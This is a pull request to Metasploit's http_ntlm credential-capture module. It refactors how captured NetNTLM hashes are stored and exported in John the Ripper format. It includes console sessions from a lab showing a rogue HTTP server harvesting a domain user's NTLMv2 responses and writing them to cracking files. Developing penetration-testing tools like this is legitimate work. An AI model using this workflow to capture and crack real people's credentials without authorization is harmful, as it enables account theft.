### PR TITLE
Fix #5216: Report hashes on ntlm_http with create_credential_login

### DIFF
--- a/modules/auxiliary/server/capture/http_ntlm.rb
+++ b/modules/auxiliary/server/capture/http_ntlm.rb
@@ -293,13 +293,11 @@ class Metasploit3 < Msf::Auxiliary
       capturedtime = Time.now.to_s
       case ntlm_ver
       when NTLM_CONST::NTLM_V1_RESPONSE
-        smb_db_type_hash = "smb_netv1_hash"
         capturelogmessage =
           "#{capturedtime}\nNTLMv1 Response Captured from #{host} \n" +
           "DOMAIN: #{domain} USER: #{user} \n" +
           "LMHASH:#{lm_hash_message ? lm_hash_message : "<NULL>"} \nNTHASH:#{nt_hash ? nt_hash : "<NULL>"}\n"
       when NTLM_CONST::NTLM_V2_RESPONSE
-        smb_db_type_hash = "smb_netv2_hash"
         capturelogmessage =
           "#{capturedtime}\nNTLMv2 Response Captured from #{host} \n" +
           "DOMAIN: #{domain} USER: #{user} \n" +
@@ -310,7 +308,6 @@ class Metasploit3 < Msf::Auxiliary
       when NTLM_CONST::NTLM_2_SESSION_RESPONSE
         # we can consider those as netv1 has they have the same size and i cracked the same way by cain/jtr
         # also 'real' netv1 is almost never seen nowadays except with smbmount or msf server capture
-        smb_db_type_hash = "smb_netv1_hash"
         capturelogmessage =
           "#{capturedtime}\nNTLM2_SESSION Response Captured from #{host} \n" +
           "DOMAIN: #{domain} USER: #{user} \n" +
@@ -326,20 +323,19 @@ class Metasploit3 < Msf::Auxiliary
       # DB reporting
       # Rem : one report it as a smb_challenge on port 445 has breaking those hashes
       # will be mainly use for psexec / smb related exploit
-      report_auth_info(
-        :host  => ip,
-        :port => 445,
-        :sname => 'smb_challenge',
-        :user => user,
-        :pass => domain + ":" +
-          ( lm_hash + lm_cli_challenge.to_s ? lm_hash + lm_cli_challenge.to_s : "00" * 24 ) + ":" +
-          ( nt_hash + nt_cli_challenge.to_s ? nt_hash + nt_cli_challenge.to_s :  "00" * 24 ) + ":" +
-          datastore['CHALLENGE'].to_s,
-        :type => smb_db_type_hash,
-        :proof => "DOMAIN=#{domain}",
-        :source_type => "captured",
-        :active => true
-      )
+      opts_report = {
+        ip: ip,
+        user: user,
+        domain: domain,
+        ntlm_ver: ntlm_ver,
+        lm_hash: lm_hash,
+        nt_hash: nt_hash
+      }
+      opts_report.merge!(lm_cli_challenge: lm_cli_challenge) if lm_cli_challenge
+      opts_report.merge!(nt_cli_challenge: nt_cli_challenge) if nt_cli_challenge
+
+      report_creds(opts_report)
+
       #if(datastore['LOGFILE'])
       #  File.open(datastore['LOGFILE'], "ab") {|fd| fd.puts(capturelogmessage + "\n")}
       #end
@@ -405,5 +401,82 @@ class Metasploit3 < Msf::Auxiliary
       end
     end
   end
+
+  def report_creds(opts)
+    ip = opts[:ip] || rhost
+    user = opts[:user] || nil
+    domain = opts[:domain] || nil
+    ntlm_ver = opts[:ntlm_ver] || nil
+    lm_hash = opts[:lm_hash] || nil
+    nt_hash = opts[:nt_hash] || nil
+    lm_cli_challenge = opts[:lm_cli_challenge] || nil
+    nt_cli_challenge = opts[:nt_cli_challenge] || nil
+
+    case ntlm_ver
+    when NTLM_CONST::NTLM_V1_RESPONSE, NTLM_CONST::NTLM_2_SESSION_RESPONSE
+      hash = [
+        user, '',
+        domain ? domain : 'NULL',
+        lm_hash ? lm_hash : '0' * 48,
+        nt_hash ? nt_hash : '0' * 48,
+        @challenge.unpack('H*')[0]
+      ].join(':').gsub(/\n/, '\\n')
+      report_hash(ip, user, 'netntlm', hash)
+    when NTLM_CONST::NTLM_V2_RESPONSE
+      hash = [
+        user, '',
+        domain ? domain : 'NULL',
+        @challenge.unpack('H*')[0],
+        lm_hash ? lm_hash : '0' * 32,
+        lm_cli_challenge ? lm_cli_challenge : '0' * 16
+      ].join(':').gsub(/\n/, '\\n')
+      report_hash(ip, user, 'netlmv2', hash)
+
+      hash = [
+        user, '',
+        domain ? domain : 'NULL',
+        @challenge.unpack('H*')[0],
+        nt_hash ? nt_hash : '0' * 32,
+        nt_cli_challenge ? nt_cli_challenge : '0' * 160
+      ].join(':').gsub(/\n/, '\\n')
+      report_hash(ip, user, 'netntlmv2', hash)
+    else
+      hash = domain + ':' +
+        ( lm_hash + lm_cli_challenge.to_s ? lm_hash + lm_cli_challenge.to_s : '00' * 24 ) + ':' +
+        ( nt_hash + nt_cli_challenge.to_s ? nt_hash + nt_cli_challenge.to_s :  '00' * 24 ) + ':' +
+        datastore['CHALLENGE'].to_s
+      report_hash(ip, user, nil, hash)
+    end
+  end
+
+  def report_hash(ip, user, type_hash, hash)
+    service_data = {
+      address: ip,
+      port: 445,
+      service_name: 'smb',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: self.fullname,
+      origin_type: :service,
+      private_data: hash,
+      private_type: :nonreplayable_hash,
+      username: user
+    }.merge(service_data)
+
+    unless type_hash.nil?
+      credential_data.merge!(jtr_format: type_hash)
+    end
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
 
 end


### PR DESCRIPTION
Report ntlm_http hashes with create_credential_login instead of report_auth_info

See #5216
## Verification
- [ ] Create Windows 2008 Domain (or any Windows Domain I guess)
- [ ] Run the http_ntlm module, setting the JOHNPWFILE option to verify hashes:

```
msf > use auxiliary/server/capture/http_ntlm
msf auxiliary(http_ntlm) > set srvport 8282
srvport => 8282
msf auxiliary(http_ntlm) > set JOHNPWFILE /tmp/john_test
JOHNPWFILE => /tmp/john_test
msf auxiliary(http_ntlm) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf auxiliary(http_ntlm) > workspace -a patch_http_ntlm
[*] Added workspace: patch_http_ntlm
msf auxiliary(http_ntlm) > rerun
[*] Reloading module...
[*] Auxiliary module execution completed
msf auxiliary(http_ntlm) >
[*] Using URL: http://172.16.158.1:8282/xxM1GR
[*] Server started.
```
- [ ] Visit the URL from a domain machine, provide credentials in the login popup. VERIFY which the module captures the hashes:

```
msf auxiliary(http_ntlm) >
[*] Using URL: http://172.16.158.1:8282/xxM1GR
[*] Server started.
[*] 172.16.158.132   http_ntlm - 2015-05-19 00:13:17 -0500
NTLMv2 Response Captured from WIN-F46QAN3U3UH
DOMAIN: 172.16.158.1 USER: juan
LMHASH:bc98cd901b910599fd3e631a0e42c98b LM_CLIENT_CHALLENGE:10af4d1e88fa0e93
NTHASH:41fb5c47b0739ece4a196e6cb20ebf5d NT_CLIENT_CHALLENGE:0101000000000000d0adc383f291d00110af4d1e88fa0e930000000002000c0044004f004d00410049004e000000000000000000

```
- [ ] Finish the jobs

```
msf auxiliary(http_ntlm) > jobs -K
Stopping all jobs...

[*] Server stopped.
[*] Server stopped.
```
- [ ] Check creds have been stored in the database:

```
msf auxiliary(http_ntlm) > creds
Credentials
===========

host            service        public  private                                                                                                                                                                        realm  private_type
----            -------        ------  -------                                                                                                                                                                        -----  ------------
172.16.158.132  445/tcp (smb)  juan    juan::172.16.158.1:1122334455667788:bc98cd901b910599fd3e631a0e42c98b:10af4d1e88fa0e93                                                                                                 Nonreplayable hash
172.16.158.132  445/tcp (smb)  juan    juan::172.16.158.1:1122334455667788:41fb5c47b0739ece4a196e6cb20ebf5d:0101000000000000d0adc383f291d00110af4d1e88fa0e930000000002000c0044004f004d00410049004e000000000000000000         Nonreplayable hash

```
- [ ] Compare the hashes with the john the ripper format dumped files. VERIFY which are the same

```
msf auxiliary(http_ntlm) > cat /tmp/john_test_netlmv2
[*] exec: cat /tmp/john_test_netlmv2

juan::172.16.158.1:1122334455667788:bc98cd901b910599fd3e631a0e42c98b:10af4d1e88fa0e93
msf auxiliary(http_ntlm) > cat /tmp/john_test_netntlmv2
[*] exec: cat /tmp/john_test_netntlmv2

juan::172.16.158.1:1122334455667788:41fb5c47b0739ece4a196e6cb20ebf5d:0101000000000000d0adc383f291d00110af4d1e88fa0e930000000002000c0044004f004d00410049004e000000000000000000
```
